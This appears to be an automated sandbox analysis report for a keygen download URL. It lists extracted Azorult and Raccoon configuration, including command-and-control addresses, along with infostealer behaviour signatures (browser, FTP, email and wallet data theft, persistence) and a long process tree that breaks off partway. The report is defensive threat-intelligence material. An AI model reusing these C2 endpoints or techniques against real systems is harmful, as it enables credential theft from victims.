Analysis

  • max time kernel
    1785s
  • max time network
    1784s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    03-05-2021 12:10

General

  • Target

    https://keygenit.com/d/1f0795bb5b10sn3q0934.html

  • Sample

    210503-g6ksgv9ez2

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

4972224408152dfd9d8d3efd01bf7b7038392f8a

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Downloads MZ/PE file
  • Executes dropped EXE 42 IoCs
  • Loads dropped DLL 28 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 15 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 18 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2720
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2708
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2608
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2380
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/1f0795bb5b10sn3q0934.html
              1⤵
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:4432
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x60,0xd4,0x7ff9e84d4f50,0x7ff9e84d4f60,0x7ff9e84d4f70
                2⤵
                  PID:4688
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1536 /prefetch:2
                  2⤵
                    PID:5100
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1636 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3256
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2212 /prefetch:8
                    2⤵
                      PID:3260
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
                      2⤵
                        PID:4116
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
                        2⤵
                          PID:4108
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                          2⤵
                            PID:4264
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                            2⤵
                              PID:4220
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
                              2⤵
                                PID:4396
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
                                2⤵
                                  PID:4372
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:8
                                  2⤵
                                    PID:624
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5192 /prefetch:8
                                    2⤵
                                      PID:3880
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
                                      2⤵
                                        PID:1380
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5232 /prefetch:8
                                        2⤵
                                          PID:4344
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
                                          2⤵
                                            PID:2100
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5208 /prefetch:8
                                            2⤵
                                              PID:4944
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:8
                                              2⤵
                                                PID:4932
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5944 /prefetch:8
                                                2⤵
                                                  PID:3196
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:8
                                                  2⤵
                                                    PID:4256
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:8
                                                    2⤵
                                                      PID:4252
                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                      2⤵
                                                        PID:1008
                                                        • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                          "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff77525a890,0x7ff77525a8a0,0x7ff77525a8b0
                                                          3⤵
                                                            PID:648
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7132 /prefetch:8
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:772
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6112 /prefetch:8
                                                          2⤵
                                                            PID:1860
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:8
                                                            2⤵
                                                              PID:1712
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:8
                                                              2⤵
                                                                PID:624
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6888 /prefetch:8
                                                                2⤵
                                                                  PID:4968
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:8
                                                                  2⤵
                                                                    PID:1148
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6828 /prefetch:8
                                                                    2⤵
                                                                      PID:4288
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5608 /prefetch:8
                                                                      2⤵
                                                                        PID:748
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6620 /prefetch:8
                                                                        2⤵
                                                                          PID:428
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:8
                                                                          2⤵
                                                                            PID:4236
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6236 /prefetch:8
                                                                            2⤵
                                                                              PID:4252
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5264 /prefetch:8
                                                                              2⤵
                                                                                PID:4932
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5548 /prefetch:8
                                                                                2⤵
                                                                                  PID:4404
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4344
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7344 /prefetch:8
                                                                                    2⤵
                                                                                      PID:3404
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7420 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4720
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7444 /prefetch:8
                                                                                        2⤵
                                                                                          PID:220
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7396 /prefetch:8
                                                                                          2⤵
                                                                                            PID:3836
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7960 /prefetch:8
                                                                                            2⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4384
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7368 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4532
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7384 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4524
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8188 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:5172
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7428 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5184
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8216 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5216
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8248 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5256
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8256 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5268
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8264 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5280
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8280 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:5336
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8372 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:5372
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8236 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:5460
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8740 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5500
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:5548
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8204 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:5612
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9156 /prefetch:1
                                                                                                                      2⤵
                                                                                                                        PID:5672
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4160 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5872
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4100 /prefetch:8
                                                                                                                        2⤵
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5984
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2460 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:5628
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,3967826196032348060,816634015371888248,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:8
                                                                                                                          2⤵
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:4708
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                        1⤵
                                                                                                                          PID:1924
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:1448
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                          1⤵
                                                                                                                            PID:1340
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                            1⤵
                                                                                                                              PID:1180
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                              1⤵
                                                                                                                                PID:1128
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:512
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:356
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:4616
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:5704
                                                                                                                                  • C:\Windows\System32\rundll32.exe
